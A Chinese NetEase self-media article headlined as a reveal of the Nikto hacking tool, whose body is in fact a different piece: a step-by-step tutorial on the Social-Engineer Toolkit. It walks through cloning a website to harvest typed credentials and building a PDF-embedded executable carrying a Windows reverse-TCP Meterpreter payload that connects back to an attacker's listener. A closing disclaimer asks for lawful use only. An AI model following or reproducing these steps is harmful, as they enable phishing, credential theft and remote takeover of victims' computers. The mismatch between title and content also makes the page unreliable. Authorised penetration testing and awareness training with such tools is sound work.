网易首页 > 网易号 > 正文 申请入驻

揭秘最为知名的黑客工具之一:Nikto

0
分享至

用心做分享,只为给您最好的学习教程

如果您觉得文章不错,欢迎持续学习

Social-Engineer Toolkit (SET) 工具介绍与使用教程

工具介绍

Social-Engineer Toolkit (SET) 是一个开源的渗透测试框架,专门用于进行社会工程学攻击。SET 由 TrustedSec 创始人 David Kennedy 开发,旨在模拟各种社会工程攻击,以帮助安全研究人员和系统管理员测试和提高系统的安全性。该工具支持多种攻击向量,包括钓鱼攻击、恶意文件生成、网站克隆等。

功能与特点

  • 多种攻击向量:支持钓鱼攻击、恶意文件生成、网站克隆、短信钓鱼等多种社会工程攻击。
  • 模块化设计:具有模块化的架构,可以方便地添加、删除和更新攻击模块。
  • 自动化攻击:提供自动化攻击选项,简化了攻击过程,适合不同技术水平的用户。
  • 集成 Metasploit:与 Metasploit 框架集成,增强了攻击能力和可操作性。

使用教程

以下是使用 Social-Engineer Toolkit 进行社会工程学攻击的详细教程。

步骤一:安装 SET

在 Kali Linux 上安装

更新系统包管理器:

打开终端,运行以下命令更新系统包管理器:

sudo apt update

安装 SET:

使用包管理器安装 SET:

sudo apt install set

启动 SET:

安装完成后,启动 SET:

sudo setoolkit

在其他 Linux 发行版上安装

克隆 SET 仓库:

从 GitHub 仓库克隆 SET 源代码:

git clone https://github.com/trustedsec/social-engineer-toolkit.git

进入 SET 目录:

cd social-engineer-toolkit

安装依赖:

安装 SET 所需的依赖:

sudo python3 setup.py install

启动 SET:

安装完成后,启动 SET:

sudo setoolkit

步骤二:使用 SET 进行钓鱼攻击

选择攻击类型:

启动 SET 后,将看到一个菜单。选择“1) Social-Engineering Attacks”:

1) Social-Engineering Attacks

2) Penetration Testing (Fast-Track)

3) Third Party Modules

4) Update the Social-Engineer Toolkit

5) Update SET configuration

6) Help, Credits, and About

Enter your choice: 1

选择攻击向量:

选择“2) Website Attack Vectors”:

1) Spear-Phishing Attack Vectors

2) Website Attack Vectors

3) Infectious Media Generator

4) Create a Payload and Listener

5) Mass Mailer Attack

6) Arduino-Based Attack Vector

7) SMS Spoofing Attack Vector

8) Wireless Access Point Attack Vector

9) QRCode Generator Attack Vector

10) Powershell Attack Vectors

11) Third Party Modules

Enter your choice: 2

选择具体攻击方法:

选择“3) Credential Harvester Attack Method”:

1) Java Applet Attack Method

2) Metasploit Browser Exploit Method

3) Credential Harvester Attack Method

4) Tabnabbing Attack Method

5) Web Jacking Attack Method

6) Multi-Attack Web Method

7) HTA Attack Method

Enter your choice: 3

选择攻击模式:

选择“2) Site Cloner”以克隆目标网站:

1) Web Templates

2) Site Cloner

3) Custom Import

Enter your choice: 2

输入目标 URL:

输入要克隆的目标网站 URL,例如:

Enter the URL to clone: http://example.com

启动 Apache 服务器:

SET 会提示你是否要启动 Apache 服务器,选择“yes”以继续:

Do you want to start the Apache server [yes|no]: yes

步骤三:监控和收集凭据

监控收集的凭据:

在攻击进行中,可以通过 SET 控制台监控收集到的凭据信息。所有输入的凭据将显示在终端中。

步骤四:生成恶意文件

选择攻击类型:

在 SET 主菜单中选择“1) Social-Engineering Attacks”:

Enter your choice: 1

选择攻击向量:

选择“1) Spear-Phishing Attack Vectors”:

Enter your choice: 1

选择攻击方法:

选择“2) Create a FileFormat Payload”:

Enter your choice: 2

选择攻击载荷:

选择“5) Windows Reverse_TCP Meterpreter”:

Enter your choice: 5

设置监听主机和端口:

设置攻击者的 IP 地址和监听端口,例如:

Enter the IP address (LHOST) for the payload: 192.168.1.100

Enter the port (LPORT) for the payload: 4444

选择文件格式:

选择“16) PDF Embedded EXE Social Engineering”:

Enter your choice: 16

生成文件:

SET 将生成一个恶意 PDF 文件,发送给目标用户。当目标用户打开该文件时,攻击载荷将执行。

总结

Social-Engineer Toolkit (SET) 是一款功能强大的社会工程学攻击工具,通过其多种攻击向量和模块化设计,可以帮助安全研究人员和系统管理员测试和提高系统的安全性。本文详细介绍了 SET 的安装、钓鱼攻击和生成恶意文件的使用方法,帮助用户快速掌握该工具的使用技巧。在实际操作中,请务必遵守相关法律法规,仅在合法授权的情况下使用该工具。

通过使用 SET,安全研究人员和系统管理员可以更加全面地了解系统的社会工程学攻击风险,及时采取措施,提高系统的整体安全性。

本文仅作技术分享 切勿用于非法途径

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
大年初一都是好消息:乌军获两年半来最大战果、基辅供电恢复95%

大年初一都是好消息:乌军获两年半来最大战果、基辅供电恢复95%

鹰眼Defence
2026-02-17 10:30:12
张一鸣背后的女人:字节不养功臣

张一鸣背后的女人:字节不养功臣

茉莉聊聊天
2026-02-17 09:20:39
詹姆斯最新下家赔率出炉:骑士居首勇士第二 尼克斯掘金进前五

詹姆斯最新下家赔率出炉:骑士居首勇士第二 尼克斯掘金进前五

罗说NBA
2026-02-17 11:06:58
太尴尬了!堵车动弹不得,重庆车主称接到违停短信提醒,惶恐不安

太尴尬了!堵车动弹不得,重庆车主称接到违停短信提醒,惶恐不安

火山詩话
2026-02-16 11:43:17
马年春晚带火了机器人,机器人卖爆了,就连售价63万元的机器人也秒光

马年春晚带火了机器人,机器人卖爆了,就连售价63万元的机器人也秒光

极目新闻
2026-02-17 11:03:42
春晚引发西方恐慌

春晚引发西方恐慌

美第奇效应
2026-02-17 02:02:49
巨大争议!加州80岁华裔老太太撞死苹果高管一家四口,迅速转移财产,仅缓刑+吊销驾照

巨大争议!加州80岁华裔老太太撞死苹果高管一家四口,迅速转移财产,仅缓刑+吊销驾照

大洛杉矶LA
2026-02-17 03:23:37
正月初一湖北一女生凌晨离家回深圳,感谢自己有随时跑路的勇气

正月初一湖北一女生凌晨离家回深圳,感谢自己有随时跑路的勇气

九方鱼论
2026-02-17 11:49:46
之前挺俄,现在批俄,随总路线一起摇摆?

之前挺俄,现在批俄,随总路线一起摇摆?

苍穹下第一玩家
2026-02-17 11:00:49
为啥中国精英盼着中国输?复旦教授:中国一旦追上,绿卡就会贬值

为啥中国精英盼着中国输?复旦教授:中国一旦追上,绿卡就会贬值

大鱼简科
2026-02-15 22:00:23
刷屏!马丽“单飞”,沈腾紧张到说错词?这个小品讽刺拉满,网友:尺度不小!秦岚、王楚然、李沁古装“美到词穷”,王一博回应打滑

刷屏!马丽“单飞”,沈腾紧张到说错词?这个小品讽刺拉满,网友:尺度不小!秦岚、王楚然、李沁古装“美到词穷”,王一博回应打滑

每日经济新闻
2026-02-17 11:08:38
大年初一凌晨,冬奥会奖牌榜更新!中国队仍0金牌,谷爱凌创历史

大年初一凌晨,冬奥会奖牌榜更新!中国队仍0金牌,谷爱凌创历史

侃球熊弟
2026-02-17 06:25:35
春晚节目单公布:一共3个小品,没有相声!沈腾、马丽不演小品演“贺岁微电影”,宇树科技机器人将表演武术节目!央视记者实探春晚后台

春晚节目单公布:一共3个小品,没有相声!沈腾、马丽不演小品演“贺岁微电影”,宇树科技机器人将表演武术节目!央视记者实探春晚后台

每日经济新闻
2026-02-16 16:08:00
世界不需要程序员了?马斯克预言,2026年底编程将迈向全自动化

世界不需要程序员了?马斯克预言,2026年底编程将迈向全自动化

极目新闻
2026-02-17 12:50:39
“沈腾说错词”,冲上热搜

“沈腾说错词”,冲上热搜

环球网资讯
2026-02-17 10:01:01
国家终于不再原谅王濛,77枚金牌不是万能,狂妄自大只会被抛弃

国家终于不再原谅王濛,77枚金牌不是万能,狂妄自大只会被抛弃

来科点谱
2026-02-17 11:02:36
春晚机器人被外国媒体这么宣传,我才发现事情并不简单!

春晚机器人被外国媒体这么宣传,我才发现事情并不简单!

青青子衿
2026-02-17 03:28:56
除夕,美国国务卿鲁比奥发表农历新年祝福

除夕,美国国务卿鲁比奥发表农历新年祝福

环球网资讯
2026-02-17 09:58:08
隋文静:15天前我仍坐在轮椅上,《只此青绿》虽有瑕疵但无遗憾

隋文静:15天前我仍坐在轮椅上,《只此青绿》虽有瑕疵但无遗憾

懂球帝
2026-02-17 11:03:24
加拿大超市售卖中国课本,人教版各科目教材被整齐码放,网友:秒回新华书店

加拿大超市售卖中国课本,人教版各科目教材被整齐码放,网友:秒回新华书店

极目新闻
2026-02-16 19:38:57
2026-02-17 15:04:49
黑客联盟I
黑客联盟I
免费、开源、自由……
352文章数 1065关注度
往期回顾 全部

科技要闻

春晚这些机器人是怎样做到的?

头条要闻

蔡磊又踏入一个本命年:我已经一年不知道吃的是什么

头条要闻

蔡磊又踏入一个本命年:我已经一年不知道吃的是什么

体育要闻

谷爱凌:'不小心"拿到了银牌 祝大家马年大吉

娱乐要闻

春晚三大感人瞬间:周深于和伟上榜

财经要闻

大年初一,这三件事很不寻常

汽车要闻

问界M6更多信息:乾崑智驾ADS4.0+鸿蒙座舱5.0

态度原创

亲子
游戏
教育
健康
公开课

亲子要闻

春节带娃回老家,这些事一定要注意!

《怪猎物语3》制作人发来新春祝福!新作3月13日推出

教育要闻

高考红包数字揭秘!这样送才吉利

转头就晕的耳石症,能开车上班吗?

公开课

李玫瑾:为什么性格比能力更重要?

无障碍浏览 进入关怀版